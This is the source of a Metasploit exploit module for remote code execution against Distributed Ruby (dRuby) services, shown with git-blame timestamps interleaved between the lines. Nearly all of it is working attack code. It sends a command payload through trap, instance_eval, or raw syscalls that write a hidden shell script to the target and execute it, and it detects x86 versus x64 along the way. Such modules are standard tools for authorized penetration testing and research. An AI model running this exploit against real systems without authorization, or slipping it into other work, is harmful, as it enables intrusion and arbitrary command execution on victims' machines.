2016-12-23 14:12:22 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-03-27 20:00:06 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'drb/drb'
|
2011-10-15 21:09:17 +00:00
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ExcellentRanking
|
2011-03-27 20:00:06 +00:00
|
|
|
|
2017-11-30 11:46:03 +00:00
|
|
|
include Msf::Exploit::FileDropper
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2016-12-22 14:37:16 +00:00
|
|
|
'Name' => 'Distributed Ruby Remote Code Execution',
|
2013-08-30 21:28:54 +00:00
|
|
|
'Description' => %q{
|
2016-11-04 18:48:29 +00:00
|
|
|
This module exploits remote code execution vulnerabilities in dRuby.
|
2013-08-30 21:28:54 +00:00
|
|
|
},
|
|
|
|
'Author' => [ 'joernchen <joernchen[at]phenoelit.de>' ], #(Phenoelit)
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html' ],
|
2016-12-22 14:37:16 +00:00
|
|
|
[ 'URL', 'http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/' ],
|
2016-12-28 12:10:46 +00:00
|
|
|
[ 'URL', 'http://bugkraut.de/posts/tainting' ]
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'DisableNops' => true,
|
|
|
|
'Space' => 32768,
|
|
|
|
},
|
|
|
|
'Platform' => 'unix',
|
|
|
|
'Arch' => ARCH_CMD,
|
2016-11-04 18:47:36 +00:00
|
|
|
'Targets' => [
|
2017-11-30 13:51:12 +00:00
|
|
|
['Automatic', { method: 'auto'}],
|
|
|
|
['Trap', { method: 'trap'}],
|
|
|
|
['Eval', { method: 'instance_eval'}],
|
|
|
|
['Syscall', { method: 'syscall'}],
|
2016-11-04 18:47:36 +00:00
|
|
|
],
|
2013-08-30 21:28:54 +00:00
|
|
|
'DisclosureDate' => 'Mar 23 2011',
|
|
|
|
'DefaultTarget' => 0))
|
2011-03-27 20:00:06 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
2017-11-30 14:31:13 +00:00
|
|
|
OptString.new('URI', [false, "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)", nil]),
|
2017-11-30 12:36:42 +00:00
|
|
|
Opt::RHOST(nil, false),
|
|
|
|
Opt::RPORT(8787)
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2011-03-27 20:00:06 +00:00
|
|
|
|
2017-11-30 11:46:03 +00:00
|
|
|
def method_trap(p)
|
|
|
|
p.send(:trap, 23,
|
|
|
|
:"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
|
2017-11-30 14:12:15 +00:00
|
|
|
# Decide if this is running on an x86 or x64 target, using the kill(2) syscall
|
|
|
|
begin
|
|
|
|
pid = p.send(:syscall, 20)
|
|
|
|
p.send(:syscall, 37, pid, 23)
|
|
|
|
rescue Errno::EBADF
|
|
|
|
# 64 bit system
|
|
|
|
pid = p.send(:syscall, 39)
|
|
|
|
p.send(:syscall, 62, pid, 23)
|
|
|
|
end
|
2017-11-30 11:46:03 +00:00
|
|
|
p.send(:my_eval, payload.encoded)
|
|
|
|
end
|
|
|
|
|
|
|
|
def method_instance_eval(p)
|
|
|
|
p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")
|
|
|
|
end
|
|
|
|
|
|
|
|
def method_syscall(p)
|
|
|
|
filename = "." + Rex::Text.rand_text_alphanumeric(16)
|
|
|
|
|
|
|
|
begin
|
2017-11-30 12:37:04 +00:00
|
|
|
# Decide if this is running on an x86 or x64 target.
|
|
|
|
# This syscall number is getpid on x86, which will succeed,
|
|
|
|
# or writev on x64, which will fail due to missing args.
|
2017-11-30 11:46:03 +00:00
|
|
|
j = p.send(:syscall, 20)
|
|
|
|
# syscall open
|
|
|
|
i = p.send(:syscall, 8, filename, 0700)
|
|
|
|
# syscall write
|
|
|
|
p.send(:syscall, 4, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
|
|
|
|
# syscall close
|
|
|
|
p.send(:syscall, 6, i)
|
|
|
|
# syscall fork
|
|
|
|
p.send(:syscall, 2)
|
|
|
|
# syscall execve
|
|
|
|
p.send(:syscall, 11, filename, 0, 0)
|
2017-11-30 13:51:12 +00:00
|
|
|
print_status("attempting x86 execve of #{filename}")
|
2017-11-30 11:46:03 +00:00
|
|
|
|
2017-11-30 12:37:04 +00:00
|
|
|
# likely x64
|
2017-11-30 11:46:03 +00:00
|
|
|
rescue Errno::EBADF
|
|
|
|
# syscall creat
|
2017-11-30 12:37:04 +00:00
|
|
|
i = p.send(:syscall, 85, filename, 0700)
|
2017-11-30 11:46:03 +00:00
|
|
|
# syscall write
|
2017-11-30 12:37:04 +00:00
|
|
|
p.send(:syscall, 1, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
|
2017-11-30 11:46:03 +00:00
|
|
|
# syscall close
|
2017-11-30 12:37:04 +00:00
|
|
|
p.send(:syscall, 3, i)
|
2017-11-30 11:46:03 +00:00
|
|
|
# syscall fork
|
2017-11-30 12:37:04 +00:00
|
|
|
p.send(:syscall, 57)
|
2017-11-30 11:46:03 +00:00
|
|
|
# syscall execve
|
2017-11-30 12:37:04 +00:00
|
|
|
p.send(:syscall, 59, filename, 0, 0)
|
2017-11-30 13:51:12 +00:00
|
|
|
print_status("attempting x64 execve of #{filename}")
|
2017-11-30 11:46:03 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
register_file_for_cleanup(filename) if filename
|
|
|
|
end
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exploit
|
2017-11-30 14:31:13 +00:00
|
|
|
if !datastore['URI'].blank? && !datastore['RHOST'].blank?
|
|
|
|
print_error("URI and RHOST are specified, unset one")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
if datastore['URI'].blank? && datastore['RHOST'].blank?
|
|
|
|
print_error("neither URI nor RHOST are specified, set one")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2017-11-30 12:36:42 +00:00
|
|
|
unless datastore['URI'].blank?
|
|
|
|
serveruri = datastore['URI']
|
2017-11-30 16:51:02 +00:00
|
|
|
(datastore['RHOST'], datastore['RPORT']) = serveruri.sub(/druby:\/\//i, '').split(':')
|
2017-11-30 12:36:42 +00:00
|
|
|
else
|
|
|
|
serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"
|
|
|
|
end
|
2017-11-30 11:46:03 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
DRb.start_service
|
|
|
|
p = DRbObject.new_with_uri(serveruri)
|
|
|
|
class << p
|
|
|
|
undef :send
|
|
|
|
end
|
2016-11-04 18:54:26 +00:00
|
|
|
|
2017-11-30 13:51:12 +00:00
|
|
|
if target[:method] == 'auto'
|
|
|
|
methods = ["instance_eval", "syscall", "trap"]
|
|
|
|
else
|
|
|
|
methods = [target[:method]]
|
|
|
|
end
|
|
|
|
|
2017-11-30 11:46:03 +00:00
|
|
|
methods.each do |method|
|
|
|
|
begin
|
2017-11-30 14:31:13 +00:00
|
|
|
print_status("Trying to exploit #{method} method")
|
2017-11-30 11:46:03 +00:00
|
|
|
send("method_" + method, p)
|
|
|
|
handler(nil)
|
|
|
|
break
|
2017-11-30 13:51:12 +00:00
|
|
|
rescue SecurityError, DRb::DRbConnError, NoMethodError
|
2017-11-30 14:31:13 +00:00
|
|
|
print_warning("Target is not vulnerable to #{method} method")
|
2017-11-30 11:46:03 +00:00
|
|
|
end
|
2016-11-04 18:54:26 +00:00
|
|
|
end
|
2017-11-30 11:46:03 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2011-03-27 20:00:06 +00:00
|
|
|
end
|